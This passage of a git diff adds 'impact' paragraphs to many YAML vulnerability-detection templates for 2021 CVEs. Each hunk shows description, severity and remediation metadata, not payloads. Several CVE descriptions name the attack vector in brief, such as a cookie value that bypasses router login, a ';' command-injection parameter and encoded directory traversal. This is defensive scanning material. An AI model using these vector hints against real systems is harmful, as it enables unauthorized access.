of this vulnerability can lead to remote code execution, potentially allowing an attacker to take control of the affected system. remediation: | Upgrade Laravel to version 8.4.3 or higher to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index 39167defda..3860ba2533 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: SIS Informatik REWE GO SP17 before 7.7 contains a cross-site scripting vulnerability via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being displayed on web pages. reference: diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index 94db35e917..453c137399 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Akkadian Provisioning Manager is susceptible to information disclosure. The restricted shell provided can be escaped by abusing the Edit MySQL Configuration command. This command launches a standard VI editor interface which can then be escaped. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as user credentials or system configuration details. remediation: This issue was resolved in Akkadian OVA appliance version 3.0 and later, Akkadian Provisioning Manager 5.0.2 and later, and Akkadian Appliance Manager 3.3.0.314-4a349e0 and later. reference: - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/ diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index b3062892fd..5a8b14b10f 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml 
@@ -5,6 +5,8 @@ info: author: Ahmed Abou-Ela severity: medium description: BeyondTrust Secure Remote Access Base through 6.0.1 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement. remediation: | Upgrade to a patched version of BeyondTrust Secure Remote Access Base (6.0.2 or higher) that addresses the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index 40e1768bb3..fcd9220846 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: high description: Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the server. remediation: | Apply the latest security patches or updates provided by Hitachi Vantara to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 595c3397a6..a498648843 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml 
@@ -5,6 +5,8 @@ info: author: gy741,dhiyaneshDk severity: medium description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of WebCTRL OEM that addresses the XSS vulnerability (CVE-2021-31682). reference: diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index 93af507b9d..156dfa117f 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data exfiltration, and complete compromise of the affected router. remediation: | Apply the latest firmware update provided by Tenda to fix the remote command injection vulnerability (CVE-2021-31755). reference: diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 704bb29590..e13c1ecbe7 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml 
@@ -5,6 +5,8 @@ info: author: taielab severity: critical description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. + impact: | + Remote code execution remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. reference: - https://cwiki.apache.org/confluence/display/WW/S2-062 diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml index 03afede138..87e973b174 100644 --- a/http/cves/2021/CVE-2021-31856.yaml +++ b/http/cves/2021/CVE-2021-31856.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of Layer5 Meshery or apply the necessary security patches to mitigate the SQL Injection vulnerability (CVE-2021-31856). reference: diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index 794b9e60a8..92a9598097 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml 
@@ -5,6 +5,8 @@ info: author: jas37 severity: medium description: SysAid 20.4.74 contains a reflected cross-site scripting vulnerability via the KeepAlive.jsp stamp parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of SysAid or apply the vendor-provided security patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml index 382c44a562..2a9e6b5abb 100644 --- a/http/cves/2021/CVE-2021-32030.yaml +++ b/http/cves/2021/CVE-2021-32030.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: "ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations." + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify configurations, intercept network traffic, or launch further attacks. remediation: | Apply the latest firmware update provided by ASUS to fix the authentication bypass vulnerability (CVE-2021-32030). reference: diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml index 6a6bb52daa..c2741a0f12 100644 --- a/http/cves/2021/CVE-2021-32172.yaml +++ b/http/cves/2021/CVE-2021-32172.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of Maian Cart (>=3.8) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index b6b5310dce..94968c2f78 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -5,6 +5,8 @@ info: author: gy741,pikpikcu severity: high description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml index a1a4178b70..6bebaac24f 100644 --- a/http/cves/2021/CVE-2021-32305.yaml +++ b/http/cves/2021/CVE-2021-32305.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index 0806c53a60..71bfba04b1 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks or the exploitation of other vulnerabilities. remediation: | Upgrade to the latest version of Python Flask-Security library to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index 313ca44560..71694f6b41 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -5,6 +5,8 @@ info: author: smaranchand severity: critical description: elFinder 2.1.58 is impacted by multiple remote code execution vulnerabilities that could allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Update to elFinder 2.1.59 or later. As a workaround, ensure the connector is not exposed without authentication. reference: - https://smaranchand.com.np/2022/01/organization-vendor-application-security/ diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml index ef7007ade6..6da2da6462 100644 --- a/http/cves/2021/CVE-2021-32789.yaml +++ b/http/cves/2021/CVE-2021-32789.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system. remediation: | Update WooCommerce Blocks to version 5.6 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index 4d0cfe3507..7c2b6b05ea 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Update to the latest version of Nodejs Squirrelly template engine to mitigate the vulnerability. reference: 
diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index e710225e7a..fb66a8c8dc 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: Express-handlebars is susceptible to local file inclusion because it mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Update to the latest version of Express-handlebars to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index 2219f3dbb9..5dc676a114 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Erxes version 0.23.0 or later to mitigate the vulnerability. reference: 
diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index 7f728bc8c3..b3d9e02bc8 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -5,6 +5,8 @@ info: author: h1ei1 severity: medium description: emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file. + impact: | + An attacker can gain knowledge of the server's file system structure, potentially leading to further attacks. remediation: | Apply the latest patch or upgrade to a version that fixes the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index d033cb5c54..56bb0b2591 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, unauthorized configuration changes, and potential compromise of the affected device. remediation: | Apply the latest firmware update provided by Zyxel to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index a6f79e56cf..1a994e1ca3 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. + impact: | + An attacker can gain unauthorized access to the device, potentially compromising the security and privacy of the system. remediation: | Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index 64d11d5962..d2affbe47a 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: CommScope Ruckus IoT Controller is susceptible to information disclosure vulnerabilities because a 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). + impact: | + Successful exploitation of this vulnerability could result in the exposure of sensitive data, potentially leading to further attacks or unauthorized access. remediation: | Apply the latest security patches or updates provided by CommScope to mitigate the information disclosure vulnerability (CVE-2021-33221). reference: diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index 7408f7b8d9..7e4459da5d 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";". + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the integrity and confidentiality of the affected system. remediation: | Upgrade RaspAP to a version higher than 2.6.5 to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml index 8c6a803e71..d391586d5e 100644 --- a/http/cves/2021/CVE-2021-33544.yaml +++ b/http/cves/2021/CVE-2021-33544.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device, leading to unauthorized access, data theft, or further compromise of the network. remediation: | Apply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml index 62f4f79fff..d763bb7935 100644 --- a/http/cves/2021/CVE-2021-33564.yaml +++ b/http/cves/2021/CVE-2021-33564.yaml 
@@ -5,6 +5,8 @@ info: author: 0xsapra severity: critical description: Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Ruby Dragonfly to version 1.4.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index 9adf8bd14c..7aafc4f705 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially exposing sensitive information. remediation: | Upgrade Rstudio Shiny Server to version 1.5.16 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index 65aa75a401..b4ebea75f4 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a user's browser, leading to potential data theft or unauthorized actions. remediation: Upgrade to v5.0.0 or later. reference: - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml index 53cf74486e..613d07576e 100644 --- a/http/cves/2021/CVE-2021-3378.yaml +++ b/http/cves/2021/CVE-2021-3378.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of FortiLogger to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index 04c73677ff..0610666621 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the system. remediation: | Apply the latest security patch or update provided by the vendor to fix the directory traversal vulnerability in Cartadis Gespage 8.2.1. reference: diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index f5906d6c9f..a9437e41a4 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts in the context of the victim's browser. remediation: | Update to the latest version of the WordPress Customize Login Image plugin (3.5.3) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index ae213b8b1b..16ec13e3c2 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via the security/hostSignon.do parameter servProvCode. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml index 639b9ca05c..512ce149f3 100644 --- a/http/cves/2021/CVE-2021-34370.yaml +++ b/http/cves/2021/CVE-2021-34370.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via ssoAdapter/logoutAction.do successURL. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation and sanitization. reference: diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index 801d73d64f..8aac62557b 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Eclipse Jetty 9.4.37-9.4.42, 10.0.1-10.0.5 and 11.0.1-11.0.5 are susceptible to improper authorization. URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to potential unauthorized access or further attacks. remediation: | Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Eclipse Jetty. reference: diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 670e7ae83c..46ee5e18e0 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Microsoft Exchange Server is vulnerable to a remote code execution vulnerability. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Exchange Server, potentially leading to a complete compromise of the system. remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version. reference: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml index e7784016b7..33c383fed7 100644 --- a/http/cves/2021/CVE-2021-34621.yaml +++ b/http/cves/2021/CVE-2021-34621.yaml 
@@ -5,6 +5,8 @@ info: author: 0xsapra severity: critical description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator. + impact: | + An attacker can exploit this vulnerability to create unauthorized admin accounts and gain full control over the WordPress site. remediation: | Update to the latest version of ProfilePress to fix the admin user creation weakness. reference: diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index 6994ab8bee..9c4d061d28 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update the Securimage-WP-Fixed plugin to version 3.5.4 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index 6ea1f0e6ea..fc21b36520 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of WordPress Skaut Bazar plugin (1.3.3) or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index 8e75717a4f..050e019e6c 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Apply the latest security patch or update to a non-vulnerable version of FAUST iServer. reference: diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 664549e65b..a1e8a99627 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further attacks. remediation: Resolved in Serv-U 15.3 Hotfix 1. reference: - https://github.com/rissor41/SolarWinds-CVE-2021-35250 diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 14a6e0ae1b..2efceb1b46 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page." + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of MaxSite CMS or apply the vendor-provided security patch to mitigate the XSS vulnerability (CVE-2021-35265). reference: diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index 164e6d7678..ce5bcd5b5a 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml 
